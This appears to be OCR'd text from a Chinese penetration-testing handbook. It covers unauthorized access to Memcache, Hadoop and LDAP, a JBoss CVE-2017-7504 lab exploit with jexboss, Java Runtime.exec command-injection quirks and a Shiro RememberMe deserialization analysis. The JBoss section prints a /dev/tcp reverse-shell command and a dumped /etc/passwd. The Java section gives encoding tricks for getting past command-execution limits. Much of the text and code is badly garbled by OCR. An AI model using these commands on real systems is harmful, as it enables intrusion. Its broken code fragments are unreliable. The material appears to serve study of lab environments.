error - e.args 
Print('[-] -> () error : {}'.format(ip, error)) 


i 117 


0x06 Memcache | , 


默认 端口 11211 
提示 连接 成 功 表 示 漏 洞 存在 。 telnet «target» 11211, 或 nc -vv «target» 11211 


连接 成 功 案例 
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XXX Xe 


racter is PN]. 


(.X port 55001 
«.X port 11211 


"o not available 


X 1 -» X.X.X.x:12000, pool size 1 


X 2 -> X.x.x.x:12001, pool size 1 


119 


END - 


0x07 Hadoop 


a)HDFS 

NameNode 默认 端口 50070 
DataNode 默认 端口 50075 
httpfs 默认 端口 14000 
journalnode 默认 端口 8480 


b)YARN (JobTracker) 
ResourceManager 默认 端口 8988 
JobTracker 默认 端口 50039 
TaskTracker 默认 端口 50060 


c)Hue 默认 端口 8080 
d)YARN (JobTracker) 
master 默认 端口 60010 


regionserver 默认 端口 60030 


e)hive-server2 默认 端口 10000 


f)spark-jdbcserver 默认 端口 10003 










LI 
w Overview 
LÀ 






E Summary 
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Overview 





Summary 











X E. 
E ARDEREA. C) The word's leading. WARA 。 论坛 Elestiearh $ GZR | GTA. py $ 


















Wed Oct 25 140449 CST 2017 
| Version: 2.1 4, tcd915e1e8d9301314628057301586c1757282282 


Compiled: 2017-08-0170 
Cluster ID: CID-ta2f316a-3bd0-4776-2320-c76658201t016 


IZ by kshwachk from branch- 2,74 





Block Pool ID: BP-174762383-127.0.1.1-1508810826415 


Summary 


Security is off. 
Satemode [s off. 





cks = 1 total filesystem objectis). 

Heap Memory used 38.44 MB of 119.94 MB Heap Memory. Max Heap Memory is 956,59 MB, 

Non Heap Memory used 40.54 MB of 41.38 MB Cammited Non Heap Memory, Max Non Heap Memory Is -18， 
Configured Capacity: 294 GB 


DFS Used: 24 KB (096) 


| 再度 一 下 ， 你 就 知道 © Google “正则 表达 式 P 网 站 常山 万 同和 解决 .，(》The word'sleading.. WASS 论坛 


DataNode on 





Hadoop, 2017. 
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MAAS | G REST NODA IUS P: 3 192.16.102.11:5985, ES 
€ 1i 
nudi zem &m-—r.cwum iiw: ^ Googe — IP mx ERAS SERA. S$ RuYIDADUOMG 
uchib”: "Welcom 3 :" Sedfcc Lb 22 241 54 08309 f Sb $8", "version ware" i" The. Apache 
: ` 
使 用 工具 ldap admin 直 接连 接 即 可 
» LDAP Admin 
Start Edit View Tools 
; ow y i ] 
ant! ] Attribute aue 
objectClass top 
objectClass ÜpenLDAProotDSE 
| g s 
'u«Peopie atribute Value 
| cnzadr 
sey objectClass top 
E cus 4 objectClass dc Object 
T * obiectClass organizalion 
onach an D 
Àj cneche 4 
cre 
$ onsche 
, Cnsche 3 
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LL 


m 





Type 
Text 
Text 
ie 
3 
8 
12 


em 
e 
Las 

















JBOSS 未 授权 访问 
Jboss 未 授权 访问 


1. 什么 是 jboss? 


Jboss 是 一 个 基于 J2EE 的 开放 源 代码 的 应 用 服务 器 。 JBoss 代码 遵循 LGPL 许 可 ， 可 以 在 任何 商业 成 


2、 什 么 是 jboss 未 授权 访问 ? 


未 授权 访问 管理 控制 台 , 通过 该 漏洞 , 可 以 后 台 管 理 服务 , 可 以 通过 脚本 命令 执行 系统 命令 , 如 反弹 shell, 


3、 漏 洞 复 现 (使 用 CVE-2017-7504 的 漏洞 环境 ) 
使 用 vulhub 漏 洞 平台 ， 启 用 环境 位 置 : vulnub--jboss--cve-2017-7504 


docker-compose up -d 


启用 成 功 使 用 浏览 器 访问 : IP: 8080, 无 账号 密码 


i 192.168.245.132 110% LN 





AmaE FRM PWE msf 利 用 redis 未 授权 .， 
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BeanShellSubDeployer 
Started | 





nos 





[MBean Attribute. 
[MBean Attribute. 
[MBean Attribute. 


P3 












:service- BSHDeployer View MBean MBean Attribute. 
NE MBean Attribute. 
[MBean Attribute, 
[MBean Attribute. 
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如 下 图 所 示 : 表示 程序 可 以 正常 使 用 
root@kali: - /jexboss 


帮助 (H) 


Examples: [for more options, type python jexboss.py -h] 


python3 jexboss.py -u IP+port 


执行 ,工具 会 依次 检测 一 下 项 目 ， 有 漏洞 就 会 显示 红色 的 : VULNERABLE( 易 受 攻击 的 )， 工 具 就 会 
根据 找到 容易 受到 攻击 的 点 ， 进 行 利 用 





pa 


3 ; 开始 创建 连接 ; 
然后 选择 ye root @kali: ~/jexboss o © @ 


搜索 [5) 终端 (T) 帮助 (H) 








erse Shell (like meterpreter =]), type the command: 


YOUR IP:YOUR PORT 
-jexremote=192.168.0.10:4444 


-/bin/bash -i > /dev/tcp/192.168.0.10/4444 O>&1 2>&1 


现在 获取 了 shell， 开 始 执行 shell 命 令 


cat /etc/passwd 


IA 
N 
N 


root @kali: ~/jexboss $389 





| 文件 (F) 编辑 (E) 查看 (V) HRS) 


ommantcds 


B 
) 帮助 1H) 1 





/opt/jdk 


Shell» cat /etc/passwd 
root:x:0:0:root:/root:/bin/bash . 
&250n:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 
x:2:2:bin:/bin:/usr/sbin/nologin 
d .x:3:3:sys:/dev:/usr/sbin/nologin 
© ic: X:4:65534:sync:/bin: /bin/sync 
:>X:5:60:games:/usr/games:/usr/sbin/nologin 
:6:12:man:/var/cache/man: /usr/sbin/nologin 
7:7:lp:/var/spool/lpd:/usr/sbin/nologin 
>x:8:8:mail:/var/mail:/usr/sbin/nologin 
15:x:9:9:news:/var/spoot/news:/usr/sbin/nologin 
03 9:X:10:10:uucp:/var/spool/uucp: /usr/sbin/nologin 
Peo xy:x:13:13:proxy:/bin:/usr/sbin/nologin 
I v-data:x:33:33:www-data:/var/www:/usr/sbin/nologin 
"ckup:x:34:34:backup:/var/backups:/usr/sbin/nologin 
=t:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin 
nh .:X:39:39:ircd:/var/run/ircd:/usr/sbin/nologin 


Mmats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologi | 
r | 


n hagy:x:65534:65534:nobody: /nonexistent: /usr/sbin/nologin | 
a-t:x:100:65534::/nonexistent:/bin/false 


jc I exit 


shells B 
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Java 下 奇怪 的 命令 执行 
Java 下 奇怪 的 命令 执行 


0x01 前 言 


首先 Java 下 的 命令 执行 大 家 都 知道 常见 的 两 种 方式 : 


1. 使 用 ProcessBuilder 


ProcessBuilder pb=new ProcessBuilder(cmd); 


pb.start(); 


2. 使 用 Runtime 


Runtime.getRuntime().exec(cmd) 





也 就 是 说 上 面 cmd 人 参数 可 控 的 情况 下 ， 均 存在 命令 执行 的 问题 。 但 是 话题 回来 ， 不 太 清 楚 大 家 是 否 
遇 到 过 java 命 令 执 行 的 时 候 ， 无 论 是 windows 还 是 linux 环 境 下 ， 带 有 |,<,> 等 符号 的 命令 没 办 法 正 
常 执行 。 所 以 今天 就 进入 底层 看 看 这 两 个 东西 。 


0x02 差别 


先 选 择 跟 进 Runtime.getRuntime().exec(cmd) ， 样 例 代码 如 下 所 示 : 
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oid Main(String[] arg) throws IOException { 
meyoan/sh -c echo 111 > 3.txt"; 
roc - Runtime.getRuntime().exec(command); 

- in = proc.getInputStream(); 

Re der br = new BufferedReader(new InputStreamReader(in, "UTF8") 
ne = null; 


br.readLine())!znull) { 


intime#exec 的 构造 方法 ， 这 里 要 感谢 phithon 师 傅 提 出 的 疑问 ， 让 我 补充 完整 这 
来 ，exec 的 构造 方法 有 以 下 几 种 情况 ， 其 实 根据 传 入 的 变量 我 们 大 概 可 以 区 分 

wsstring command， 也 就 是 直接 传 入 一 个 字符 串 。 另 一 个 是 根据 String 

就 是 传 入 一 个 数组 。 
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exec(command, 5 ); 
} 
exec(command, envp, ) 
} 
{ 
exec(cmdarray, DLE Js 
J 
exec(cmdarray, envp, "p 
} 


而 根据 前 面 代码 中 ， 我 们 传 入 的 命令 是 如 下 所 示 : 


String command= ; 


所 以 会 进入 Process exec(String command) 这 个 构造 方法 进行 处 理 ， 跟 进 这 个 方法 ， 发 现 最 后 


返回 exec(command, null, null) o 


exec(command, null, null); 
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这 个 方法 的 实现 。 这 里 代码 实例 化 了 StringTokenizer 类 ， 并 且 传 入 
简单 翻译 一 下 注释 : 为 指定 的 字符 串 构造 一 个 字符 串 标记 器 。 也 
会 为 特殊 字符 打上 tag 之 类 的 东西 。 


a 





zer for the specified strin 
€°delimiter Set; which is 
i ;r&#92;f"</code>: the space character, 
character, the carriage-return character, 
Delimiter characters themselves will 


, string to be parsed. 
NullPointerException if str is «CODE»null«/CODE» 


stringTokenizer(String str): {o str: 


(str, Lu oa 


AARE Pe, &iistringTokenizer2:42H2 2 -:£[z]—"emdarray[], Mx BAM cit 
SHESHHHSHOT H], STARS Maryt, Ri] FHA. 


1, Stríng[] envp, File dir} 


ption("Empty command"); 


2 di cmdarray (slot. 5. 


not available 
c echo 111 > 3.txt" 





我 们 发 现 经 过 一 系列 的 处 理 ， 最 后 又 有 一 个 return exec 的 处 理 。 继 续 跟 进 这 个 exec 的 处 理 ， 我 们 
加 以 看 到 这 里 最 后 实例 化 processBuilder 来 处 理 我 们 伟 入 的 cmdarray。 到 这 里 实际 上 可 以 清楚 
RuntimeigetRuntime().exec() 的 底层 实际 上 也 是 ProcessBuilder。 
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ProcessBuilder(cmdarray) 
.environment(envp) 
.directory(dir) 


Stance). 


我 们 知道 ProcessBuilder.start 方 法 是 命令 执行 ， 那 么 跟 进 这 个 start 我 们 发 现 ， 首 先 prog 获 取 
cmdarray[0] 也 就 是 我 们 的 jbin/sh， 然 后 判断 security 是 否 为 null， 如 果 不 为 null 就 会 校 验 
checkExec。 


{string arg : cmdarray) 
LL) 


T 


t 


VR GT: j { iS emoty 
String i : s {°/bin/sh", "—c^, "echo", "111", ">", + 1 more) 


SecurityManager security - System.getSecurityManager(); 
f (security != null) 
security. checkExec (prog) 2 


env emdarray 
dir 
red 
redg 
) catch (IOException | IllegalA 
String exceptionInfo =“; " 
Throwable cause = e; 
if ({e i IOExceptio 
disclose the 


security. checkRead(p 
catch (SecurityExcepti 


exceptionInfo = "'; 
cause = se; 


进入 之 后 我 们 就 可 以 看 到 最 后 是 调用 java.lang.UnixProcess 这 个 类 来 执行 命令 ， 而 且 我 们 发 现 执 
行 命令 的 时 候 实际 上 是 根据 cmdarray[0] 来 判断 用 什么 命令 。 而 在 java.lang.UnixProcess 这 个 类 里 
面 是 调用 forkAndExec 来 为 命令 创建 环境 等 操作 。 我 们 看 到 当前 断 点 pid 是 2653， 而 这 里 确实 起 了 
一 个 sh 的 进程 。 





501 2653 2510 6 9:54AM 7? 0:00.00 (sh) 
501 3044 2881 © 9:55AM ttysg61 0:00.01 grep —-color=auto —-exclude-dir 


z.bzr —exclude-dir-CVS --exclude-dir-.git —-exclude-dir-.hg —exclude-dir-.svn 
2653 









prog 获 取 
会 校 验 


门 发 现 执 
5 这 个 类 里 
ALET 








ET} in/sh -c echo 111 > 3.txt 在 bash 命 令 行 下 也 不 会 
mud, ANRIAIE /bin/s an. oe 
i /bin/sh -c "echo 111 > 3.txt" ， 看 这 两 段 代 码 的 命令 执行 的 

EY 


* uS i = , 7 »r 
| string[] command = { 


string command- /^^ 

"uU, AB Bn aba 经 过 

先 先 看 String command="/bin/sh -c \"echo 111 > 3.txt\""; ,按照 前 面 的 分 析 ， 经 过 
首 


StringTokenizer 这 个 类 进行 拆 分 之 后 变 成 了 {"/bin/sh", "- 


,3.txt""} o 


émdarray, String[] envp, File dir) 


sBuilder(cmdarray) "omdarrays ("JbIn/sh", "cct, ""acho", "133", "s". #1 more? 


cmdarray 


ctErrorStream); 


jrep 12473 
9917 0 10:16AM ?? 0:00.00 (sh) : 
12550 2881 60 10:16AM ttys001 0:00.00 grep —-color=auto —-exclude-dir 
exclude-dir-CVS --exclude-dir-.git —-exclude-dir=.hg —exclude-dir-.svn 


但 是 我 们 发 现 ， 经 过 StringTokenizer 这 类 拆 分 之 后 ， 命 令 完全 变 了 一 个 味道 ， 语 义 完全 变 了 ， 并 不 
是 我 们 想 要 的 结果 ， 那 我 们 再 看 看 String[] command = { "/bin/sh", "-c", "echo 111 > 
Sext" ); 的 结果 。 因为 我 们 传 入 的 是 array 数 组 类 型 ， 这 里 直接 将 命令 直接 带 入 了 


20SSBuilder 进 行 处 理 ， 前 面 完全 没有 经 过 StringTokenizer 这 个 类 的 拆 分 。 也 就 是 他 完整 的 保 
存 了 我 想 要 的 语义 。 


Process exec( GE String cmdarray[]) throws 10EXception { 


return 


Process exec(String[] tmdarray, String[l'envp, File emdarray: ("/bin/sh', “scl, echo; 1110 1;t 
S: IOException ; ies 


-environment(ehvp). 
-directory(dáp) qn 
start(); 

























也 就 是 说 getRuntime().exec(} 如 果 直 接 传 入 字符 串 会 经 过 StringTokenizer 的 分 割 ， 
ASHE BBR) 达 的 意 意思 aO 


进而 破坏 二 


下 面 这 段 代码 是 否 存在 命令 执行 的 问题 ， 要 是 在 PHP 下 ， 我 会 斩钉截铁 的 说 是 ， 但 是 回 到 java 环 和 
下 ， 我 们 发 现 | 等 一 些 特殊 符号 没 办 法 使 用 ， 而 且 传 入 的 是 字符 串 ， 遇 到 空格 会 被 
StringTokenizer 进 行 切 割 ， 所 以 实际 上 下 面 这 段 代 码 是 没 办 法 使 用 的 。 


String str = request.getParameter ( ye 
String cmdstr = + Orel 


Runtime.getRuntime().exec(cmdstr) 


再 来 一 段 代码 ， 能 够 执行 命令 ， 但 是 很 受 限 ， 我 们 知道 命令 根据 cmdarrayf0] 来 确认 以 什么 命令 环 
境 启动 ， 这 里 确实 以 /binfsh 启 动 了 ， 但 是 后 面 的 命令 执行 的 时 候 存在 问题 ， 它 仅 能 执行 单条 命令 


拼接 不 了 相关 参数 。 
String str = request.getParameter( J? 
String cmdstr = + cmd; 


Runtime. getRuntime().exec(cmdstr) 


ry/Java/ Y percer ear p "A m a 
9bjc[22780): Class JavaLaunchHelper is mented in JavaVirtuaWMachines/jdk1.8.0. 40. jdk/Conte 
fbin/sh -c whoami | ls 
linkir 


最 后 再 来 一 段 代 码 ， 下 面 这 段 代 码 才 会 是 java 下 命令 执行 的 完全 体 。 


String str = request.getParameter ( ys 
| String[] cmdstr = { 2 7 str y. 


| Runtime.getRuntime().exec(cmdstr) 


后 面 我 翻 到 一 篇 文章 ， 实 际 上 也 是 差不多 这 个 情况 ， 实 际 上 也 是 这 个 StringTokenizer 这 个 类 针对 命 
念 进行 处 理 可 能 会 造成 非 预期 的 结果 。 
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ris that any white-space sequences vital in your command must be 
ise it would be eaten by Java's StringTokenizer, e.g.: 


$@|sh . echo /bin/echo -e "“tab\trequired”' 
terested in what the process tree looks like: 


$@|sh . echo ps ft’ 

TIME COMMAND 

0:03 /bin/bash 

0:00 X java Exec sh -c $@|/sh . echo ps ft 


0:00 V. sh -c $@|sh . echo ps ft 
0:00 \ 8h 
0:00 Xn ps ft 


sBeilder(String... command) { 
nmand = new ArrayList«»(command.length); 
tring arg : command) 


s.command.add(arg); 


Ressbuiider(List<String> command) { 
and == null) 
row new NullPointerException(); 


ommand = command; 


K Array 类 型 或 者 List 类 型 ， 如 果 我 们 要 执行 下 图 中 的 代码 是 不 行 的 。 
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main(String!) arg) 


String cmds="ping ~c 1 www.baidu.com’; 


TOException 


ProcessBuilder pb= ProcessBuilder(cmds); 


Process p = pb.start(); 
InputStream in = p.getInputStream(); 


BufferedReader br w BufferedReader( InputStreamReader(in, 5 "UTF8" ) ) ; 


SECUN line = null; 
.readLine())!znulil) ( 
.println(line); 


) 40. jdk/Contents/Home/bín/java ... 


plemented in both /Library/Java/JavaVi ua lac ines/jdk1.8.8 40. jdk/Contents/Home/bin/java (0x1046474c0) and /Libray, 
ion: Cannot run program "ping ~¢ 1 w aidu.com": error=2, No such file or directory 1 


essBuilder, iava:1048) 


原因 在 于 我 们 传 入 的 类 型 不 对 ， 我 们 前 面 说 过 


这 里 自然 找 不 到 我 们 要 启动 的 命令 。 


enviror 
dir, 
redirec 
redire 
(IOException | IllegalArgum 
String exceptionInfo = ": 
Throwable cause = 


所 以 Java 下 的 命令 稍微 改造 一 下 代码 就 好 。 





v Retest - 
> Ba idea 
> iy out 
ME src 





命令 执行 是 根据 cmdarray[01]， 确 认命 令 启动 环境 ， 


cmdarray 


"ping -c 1 www.baidu.com" 


t java. io.*; 


j main(Stringi] arg) ws IOException 
echo 111 > 1.txt" 
String(] command = { "/bin/sh", "-c", cmds }; 
Process proc = Runtime. getRunt exec( command) ; 





还 有 一 种 方式 就 是 用 编码 ，linux 下 可 以 用 bash 的 base64 编 码 来 解决 这 个 特殊 字符 的 问题 。 


t java.io.x; 


m 
InputStream in 


BufferedReader br = new BufferedReader InputStreamReader(in, Game 'UTFS")); 
String line = nul 
.e(({line=br. readLine({))!=nuli) { 
System... .printin(line); 





这 里 在 小 提 一 下 如 果 遇 到 命令 执行 过 滤 了 ProcessBuilder 和 getRuntime， 可 以 考虑 


java.lang.ProcessImpl.start 


0x03 小 结 





138 


ES 


Ay] 










命令 执行 的 安全 问题 JDK 沙 盒 机 制 会 进行 checkExec， 执行 命令 的 机 制 就 
4 — OMS 而 分 隔 符 后 面 的 所 有 东西 都 是 默认 为 被 执行 程序 的 参数 ， 
ķi 0 dA 询 的 参数 ， 这 也 是 我 们 前 文 一 直 聊 的 内 容 。 所 
xec() 通过 传 入 字符 串 执行 合 市 令 的 时 候 ， 应 该 尽量 避免 使 用 空格 ， 用 了 空格 可 


本 身 想 要 表达 的 意思 。 


加 到 复杂 的 命令 执行 ， 且 参 数 只 能 如 下 所 示 ， 且 只 有 一 个 位 置 可 以 控制 的 话 ， 建 
i 码 方式 ， windows 下 可 以 使 用 powershell 的 base64。 


利用 框架 ys0， 以 及 一 些 shiro 这 类 反 序 列 化 导致 的 命令 执行 实际 上 很 多 是 用 了 
到 命令 执行 的 目的 ， 且 就 像 我 们 上 面 说 的 ， 可 控 位 置 比 较 固定 ， 执 行 复杂 命令 会 
是 只 是 复习 一 下 之 前 和 人 聊 的 一 个 问题 。 


E 


Bellenvironment-f 


Shiro 反 序 列 化 记录 


0x01 BI 


shiro 反 序列 化 这 个 从 issue 550 FISA AKRAM, SUHTEUBEA BST , (mex Nike EERE 
用 的 ， 特 别 是 一 些 红 蓝 对 抗 、 护 网 的 场景 下 用 来 撕 开 口子 非常 好 用 ， 当 然 我 也 只 是 学 习 一 下 。 


0x02 漏洞 分 析 
1. 环 境 搭建 


git clone https://github.com/apache/shiro.git 
git checkout shiro-root-1.2.4 
cd ./shiro/samples/web 


mvn package -D maven.skip.test=true 


可 以 看 到 shiro 自 带 的 commons-collections 的 版 本 是 3.2.1。 


INFO] The following files have been resolved: 
org.mortbay. jetty: jsp-2.1-glassfish: jar:2.1.v20091210: test 
org.w3c.css:sac:jar:1.3:test 
org.mortbay. jetty: jsp-2.1-jetty: jar:6.1.26:test 
commons~io: commons~io:jar:1.4:test 


xalan:serializer:jar:2.7.1:test 

ant:ant:jar:1.6.5:test 

org.eclipse. jdt:core: jar: ; 

(commons—collections: commons—collections: jar:3.2.1: test | 
COnmMBTS— tang commons- Cai ; 





用 上 面 的 方法 编译 后 导入 到 tomcat 里 面 就 能 看 了 ， 当 然 编译 过 程 还 有 坑 ， 比 如 你 需要 在 .m2 目 录 下 
创建 一 个 toolchains.xml 文 件 ， 然 后 加 入 jdk 1.6 的 路 径 ， 这 个 版 本 的 编译 依赖 jdk1.6。 


H 
dii 
e 
òi 
tá 
y 
Hp 
ty 
lj 
ll 
> 


.m2 


repository 


toolchains 
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>1.6</version> 


>sun</vendor> 


e>C:Program FilesJavajdk1.6.0_45</jdkHome> 


ration> 





Gait) Shiro Remembe! 1.2.4 反 序 列 化 





让 ， 可 以 看 到 几 个 关键 信息 : 


9okieRememberMeManager 来 处 理 Cookie 


the CookieRememberMeManager. This serializes, encrypts and encodes the users identity for later retrieval. 
Ives à request from an unauthenticated user, it looks for their remembered identity by doing the following: 


value of the rememberMe cookie 


AES 
ing java serialization (Object InputStream). 
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Authenticationinfo info) ( 


-debug("AuthenticationToken did not indicate RememberMe is requested. “+ 


"RememberMe functionality will not be executed for corresponding account."); 


= Variabies 


"org.apache.shiro.authc.UsernamePasswordToken - root, remember 


代码 中 首先 会 调用 forgetidentity 针对 subject 变量 进行 处 理 ， 跟 进 
CookieRememberMeManager 中 的 forgetldentity 。 


he ass 


pected to 


t} or that this 


param subject the subject i ersistence 


ad d forgetidentity(Subject subject) 1 
(WebUtils.isHttp(subject)) 
request = WebUtils.getHttpReguest(subject); 
response = WebUtils.getHttpResponse(subject); 





会 调用 forgetldentity 构造 方法 处 理 request 和 response 请 求 ， 这 里 调用 了 removeFrom， 跟 进 
removeFrom。 可 以 看 到 在 response 响应 头 中 加 入 了 一 些 cookie 信 息 。 


getCookie().removeFrom(request, response); 
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request, response) { 


value, comment, domain, path, maxAge, version, secure, httpOnly); 


‘ta 


,rememiberMl， E > = "rememberMe" 


"deleteMe” 





回 到 刚刚 的 OonSuccessfulLogin 方 法 中 ， 这 里 对 token 进 行 了 isRememberMe， 这 个 
isRememberMe3: £ ze £t x1 EA £3 1 JURE RA T remember me 这 个 按钮 。 


i 


Username Password 

| root secret 

| presidentskroob 12345 
darkhelmet ludicrousspeed 
lonestarr vespa 





Username: root 
Password: | seeees| 


Remember Me 
Login 


sfulLogin(Subject ject, AuthenticationToken token, AuthenticationInfo info) { subject: 


Me( token) ) 4^ tokën: "org. apache 


tifYTSD E, token, into); 


+isD abled()) ( 
> AuthenticationToken did not indicate RememberMe is requested. * 
RememberMe functionality will not be executed for corresponding account," ); 
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所 以 这 里 的 结果 自然 是 true， 即 进入 到 rememberldentity 方法 处 理 传 入 的 变量 ， 跟 进 
rememberidentity 方法 ， 位 置 在 

org.apache.shiro.mgt.AbstractRememberMeManagerzrememberldentity, ， 由 于 我 们 之 癌 
authclnfo 的 值 实际 上 是 我 们 的 用 户 名 root， 这 里 经 过 处 理 传 入 到 remembertdentity( Subjec 
subject, PrincipalCollection accountPrincipals) 这 个 构造 方法 里 面 。 


hcInfo) 


912618 principals: "root" 


跟 进 这 个 构造 方法 ， 发 现 调用 convertPrincipalsToBytes 方 法 处 理 accountPrincipals 变 量 ， 
个 变量 自然 是 我 们 的 root 的 用 户 名 。 


[] bytes = convertPrincipalsToBytes(accountPrincipals); 


rememberSerializedIdentity(subject, bytes); 


BR convertPrincipalsToBytesH AAMEARR ICRA 3, Aa ABencrypth 
法 加 密 序列 化 后 的 二 进 制 字 节 。 
[] convertPrincipalsToBytes(PrincipalCollection principals) { 
[] bytes = serialize(principals); 
(getCipherService() != pity f 


bytes = encrypt(bytes); 


return bytes; 


跟 进 encrypt 方 法 ， 这 里 调用 cipherService.encrypt 针对 序列 化 的 二 进 制 进行 加 密 。 


A bytéSoürcé = cipherService, — ae cipherservicé: AesCipherServitud12658 Seti 
value = byteSource.getBytes(); 
} 


" value; 
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跟 进 ice 可 以 知道 这 个 加 密 方式 是 AESICBCIPKCS5Padding 。 
ipherServic 
根据 AesC 
FE ag cipherServicé = | — 


ity(Sub; 
Jec 
t nie ti 


schemeName = "PKCS§Padding" 
deName = "CBC" 


gBlockSize = 8 
ingPaddingSchemeName = "PKCSSPadding" 
yrmationString = "AES/CBC/PKCS5Padding" | 
ing TransformationString = = null 
thmName = "AES" 


34/5 getEncryptionCipherKey 实际 上 是 开头 中 的 DEFAULT CIPHER KEY BYTES 的 常量 ， 我 
们 看 到 结果 是 一 致 的 。 


nerating an AEG Key: 


-xphrbTxk502deziTxcaaahc 
BY 


Hencrypth 


Collection: Y & DEFAULT_CIPHER_KEY_BYTES = {byte[16]@12659} 





vals) { [ herkey() { 


encryptionCipherKey 





然后 把 Key 和 用 户 名 root 的 序列 化 带 入 进行 加 密 ， 会 返回 加 密 后 的 结果 。 


ByteSource encrypt(byte{] i plaintext: byte{352]@12657 key: byte[16]@12659 
| ivBytes 5 55 
generate isGenerateInitializationVectors GENE false); generate: true 
generate) ( | 
ivBytes = generateInitializationVector( mmm false); 
{ivBytes == null || ivBytes. length == 0) 4 
w IllegalStateException("Initialization vector generation is enabled - generated vector" + 
"cannot be null or empty."); 


encrypt(plaintext, 





紧 

接着 回 到 NEN tty (Subject subject, PrincipalCollection 

acc | LE ^ : 
SuntPrincipals) 这 个 构造 方法 中 的 rememberSerializedidentity 方法 。 


T remenberIdentity(Subject subject, *PrincipalCollection. WES ES uL. subject: WebDelegatingSub] 
ytes = convert ipalsToBytes(accountPrincipals); E 3 gge accountPrincipals: "root" 


Wi renenberSeriatiz zedIdent 
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跟 进 这 个 方法 rememberSerializedidentity , 这 个 方法 会 把 上 面 aes 加 密 后 二 进 制 字 节 流 进入 
8. M 行 加 密 ， 然 后 再 把 这 个 值 还 给 


rememberSerializedidentity(Subject sub 


4 cookie; 


f (IWebUtils.isHttp( 
. isDebu 
String msg argument is not an HTTP-aware instanc f is require 
"request response in ord o set the remember e. Returning i 
"ignoring rememberMe operation.'"; 
. debug (msg); 


obtain a servlet " 
ediately and " + E 


request = WebUtils.getHftph 
response = WebUtils,getHtt, 


digtseriatized); 


ng base64 = Based. 


Cookie template = getcookieO s the cla at 
Cookie cookie = new SimpleCooki e(template); 
cookie, setValu 


serialized: byte [3841@12668 





解密 过 程 


前 面 已 经 了 解 加 密 的 正常 整个 过 程 ， 现 在 需要 找 找 解密 的 整个 过 程 ， 我 选择 在 
apache.shiro.mgt.AbstractRememberMeManager#decrypt 这 个 位 置 下 个 断 点 ， 看 看 调用 





这 里 截取 部 分 ， 为 什么 从 DefaultSecurityManager 这 个 类 开始 ， 原因 是 因 
í SecurityManager 是 跟 对 象 ， 一 切 都 是 从 这 里 开始 的 ， 然 后 开始 进行 相关 的 身份 校 验 。 


convertBytesToPrincipals:429, AbstractRememberMeManager (org.apache.shiro.mgt) 


getRememberedPrincipals:396, AbstractRememberMeManager (org.apache.shiro.mgt) 


getRememberedidentity: 604, 


DefaultSecurityManager (org.apache.shiro.mgt) 


resolvePrincipals:492, 


createSubject:342, 


DefaultSecurityManager (org.apache.shiro.mgt) 


DefaultSecurityManager (org.apache.shiro.mgt) 


146 







he shiro.mgt.AbstractRememberMeManager#getRememberedPrincipals 万 
amberedSerializedidentity 针对 http 请 求 进行 处 理 。 


ytes. length > 8 
rincipals(bytes, s 


t ] x f size « 3 
"org.apache.shiro.web.subject.support.DefaultWebSubjectContext.SERVLET REQUE 
"org.apache.shiro.web,subject.support.DefaultWebSubjectContext.SERVLET REQUEST" 


“org.apache.shiro.web.subject.support. DefaultWebSubjectContext. SERVLET_RESPO 
"org.apache.shiro.web.subject.support.DefaultWebSubjectContext.SERVLET RESPONSE" 


"org.apache.shiro.subject.support.DefaultSubjectContext. SECURITY MANAGER" 
"org.apache.shiro.subject.support.DefaultSubjectContext. SECURITY MANAGER" 


383 getRememberedSerializedidentity , 首先 下 图 红 框 中 的 getCookie 构造 方法 先 获取 cookie 
信息 。 





tity(SubjectContext subjectContext) { 


bjectContext argument is not an HTTP-aware instance. This is required to obtain a " + 
est and response in order to retrieve the rememberMe cookie. Returning " + 
ely and ignoring rememberMe operation."; 


pSubjectContext} subjectContext; 


request = WebUtils.gethttpRequest{wsc); 
response = WebUtils. gethttpResponse(wsc 


response); 
TSATRO 





adding{(base64) ; 
bled()) { 
e("Acquired Base64 encoded identity [" + base64 + "]'"); 





Vo decoded = Base64.decode(base64) ; 
«isTraceEnabled()) { 
ro.mgt) public Cooki { 
) 
mgt ) return 


cookie; 


然后 readValue 方法 ， 根据 Cookie 中 的 name 字段 获取 Cookie 的 值 ， 然 后 返回 Cookie 的 值 。 


ji 





c String readValue( request, ignored) { 


String name = getName(); 


String vaiue 


f (cookie ! 


value = cookie, 03 B " 
A 十 "rememberMe 
-debug("Found '()' cookie talue LEAI”. BAL es 


.trace("No '()' cookie value", name); 


} value; 


Adk Sh BMAX... PAOLA Cookie .getConkieL e request, String cookieName) { 
javax. servlet. „Cookie cookies |} yest. } 
Cookies TS Rutty ( 
r (javax. servlet. -Cookie cookie ; cookies) 1 
{)..equals(conki eames). 


SS Variables 


© Static 


e = "rememberMe" 


aame "remembherMe" 


(Ð value = "ZTfy3QjMRXqpLK9HagSXolOWv8PM2P13Ww70xOHyOxpAH THF99RhHXHq2YC811gV4PFNWIT 


String readValue( request, ignored) { 
String name = getName(); 
String value = 1; 
javax. servlet. Cookie cookie = getCookiel request, name); 
(cookie {= Ut 
value = cookie. 0; 
PERIIT '{}' cookie value [{}]", name, value); 
{ 
.trace("No '()' cookie value", name); 


value: value: "'2Tfy30)MRXapLKSHagSXo0WvGPNAP13yMTOXOHyOXpAHTHFOSRHXH2YCET 1 VAPFNM rUAS S TnbBSegRTWYPI ExdgHTLBVKdIN/ ye 


然后 接着 在 getRememberedSerializedidentity 方法 中 调用 byte[] decoded = 
Base64.decode(base64) 处 理 base64 加 密 的 Cookie 信息 ， 并 且 将 这 个 Cookie HN tle 


String base64 = 
// Browsers do 
// ignore cook 
if (Cookie, 


if (base64 !z null) 1 
base64 = ensucePadding(base64] ; 
if ( —.isTrace&£nabled()) { 
.trace("Acquired Base64 encoded identity [" + base64 + "]"); 


Baseb4.ecode(basebA); baseGsi "2THyJQUMUGIpLKSHaGSXoTOMVGPHP eT xOROxpaHTHFOORIHXHG2Y CLA 
. abled0) 1 
.trace("Base64 decoded byte array length: " + (decoded {= null ? decoded. length : 0) +“ bytes.”); 


到 了 AbstractRememberMeManager 类 的 convertBytesToPrincipals 方法 处 理 二 进 抽 
字 节 码 的 Cookie 信 息 。 





&& bytes. length > 8) { as 
= convertBytesToPrincipals(bytes, subjectContext); principals: null bytes: byte 


t= 


ipals 


PrincipalFailure(re, subjectContext); 





esToPrincipals 方法 ， 这 个 方法 调用 AbstractRememberMeManager 类 中 的 
三 进 制 字 节 码 进行 解密 。 












ted Principal 


if (getcipherService() != jur 


bytes - decrypt(bytes); 


V4PENWrp 


return deserialize(bytes); 


